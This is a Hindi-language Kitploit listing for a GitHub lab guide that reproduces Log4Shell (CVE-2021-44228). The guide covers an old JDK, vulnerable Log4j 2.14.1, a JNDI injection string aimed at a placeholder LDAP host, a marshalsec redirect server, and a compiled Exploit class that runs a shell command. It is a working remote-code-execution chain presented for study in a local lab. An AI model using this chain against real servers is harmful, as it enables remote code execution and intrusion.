Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-44228 — चरण-दर-चरण पुनरुत्पादन मार्गदर्शिका CVE-2021-44228 (Log4Shell) के लिए JDK 8u20, संवेदनशील Log4j 2.14.1, marshalsec LDAP सर्वर, और कस्टम पेलोड संकलन के साथ। | Kitploit
उपकरण/GitHubGitHub/racoon-rac/cve-2021-44228
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणलर्निंग और शिक्षापेलोड डेवलपमेंटलैब और अभ्यास
GitHubracoon-rac/cve-2021-44228

CVE-2021-44228

चरण-दर-चरण पुनरुत्पादन मार्गदर्शिका CVE-2021-44228 (Log4Shell) के लिए JDK 8u20, संवेदनशील Log4j 2.14.1, marshalsec LDAP सर्वर, और कस्टम पेलोड संकलन के साथ।

रिपॉजिटरी देखें
53 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2021-44228

मुझे लगता है कि यह कहानी अधिक व्यावहारिक है (रोते हुए)christophetd/log4shell-vulnerable-app

मैंने केवल उत्सुकता और आवेग में जांच की है, इसलिए संभव है कि कुछ अस्पष्ट स्थान या गलतियाँ हों।
कृपया, अपनी जिम्मेदारी पर कार्य करें।

पुनरुत्पादन वातावरण बनाना।

linux वातावरण में काम करना चाहिए।

1. jdk डाउनलोड करना

jdk8u191 और उसके बाद के संस्करणों में com.sun.jndi.rmi.object.trustURLCodebase विकल्प जोड़ा गया है, और डिफ़ॉल्ट False है। इस स्थिति में बाहरी रूप से तैयार किए गए class को लोड नहीं किया जा सकता, इसलिए इस बार हम उससे पहले के संस्करण का उपयोग करेंगे।
(क्या आंतरिक क्लासेस को लोड या बायपास किया जा सकता है??) https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/

jdk8u20 का सीधा डाउनलोड
इसे अनज़िप करके /opt जैसी उपयुक्त जगह पर रख दें।

2. भेद्य log4j तैयार करना

log4j डाउनलोड करें
इसे अनज़िप करें और log4j-api-2.14.1.jar और log4j-core-2.14.1.jar निकाल लें (इस बार हमने उन्हें log4japp नामक निर्देशिका में रखा)।

3. log4j का क्लासपाथ सेट करें

root@kitploit:~
export CLASSPATH=:/path/to/log4japp/log4j-api-2.14.1.jar:/path/to/log4japp/log4j-core-2.14.1.jar

4. एक सरल एप्लिकेशन बनाएं

root@kitploit:~
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class log4j {


        private static final Logger logger = LogManager.getLogger(log4j.class);

        public static void main(String[] args) {
                logger.error("${jndi:ldap://your-ip:1389/resource}");
                // /resource  के बिना काम नहीं किया।
        }
}

5. marshalsec तैयार करना

mbechler/marshalsec
LDAP क्वेरी को वेब पर रीडायरेक्ट करने के लिए।

root@kitploit:~
mvn clean package -DskipTests

सुनना शुरू करें

root@kitploit:~
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://your-web-ip:8888/#Exploit"

marshalsec का रीडायरेक्शन लक्ष्य भी तैयार करें

root@kitploit:~
python3 -m http.server 8888

6. marshalsec को देने के लिए क्लास तैयार करें

root@kitploit:~
class Exploit {
    static {
        try { Runtime.getRuntime().exec("touch /tmp/evil"); } catch(Exception e) {}
    }
}

स्थापित jdk8u20 का उपयोग करके संकलन करें

root@kitploit:~
/opt/java/jdk1.8.0_20/bin/javac Exploit.java

7. शोषण (exploit)

स्थापित jdk8u20 का उपयोग करके संकलन और निष्पादन करें।

root@kitploit:~
/opt/java/jdk1.8.0_20/bin/javac log4j.java
/opt/java/jdk1.8.0_20/bin/java log4j

screenshot

टूल डाउनलोड करें